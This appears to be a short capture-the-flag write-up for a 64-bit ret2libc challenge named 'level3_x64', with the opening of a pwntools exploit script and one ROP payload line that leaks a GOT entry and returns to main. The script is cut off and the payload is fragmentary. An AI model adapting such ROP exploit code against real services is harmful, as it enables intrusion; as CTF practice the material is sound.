from pwn import *
from LibcSearcher import LibcSearcher

# con selects the target architecture: nonzero = 32-bit (i386), 0 = 64-bit (amd64)
con = 0
if con:
    print('当前程序是32位的:')
    sleep(0.3)
    context(log_level='debug', arch='i386', os='linux')
else:
    print("当前程序是64位的")
    sleep(0.3)
    context(log_level='debug', arch='amd64', os='linux')
# open the debugger in a horizontal tmux split
context.terminal = ['tmux', 'splitw', '-h']
local_file = ('./level3_x64')
elf...
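I haven't done one of these in a long time. This is a ret2libc challenge, though it looks like ret2csu would work as well.

exp: exp

The script I used with LibcSearcher before differs slightly from this one; treat this one as authoritative.

payload = b'A' * offset + p64(ret_addr) + p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(got) + p64(4) + p64(plt) + p64(main_addr)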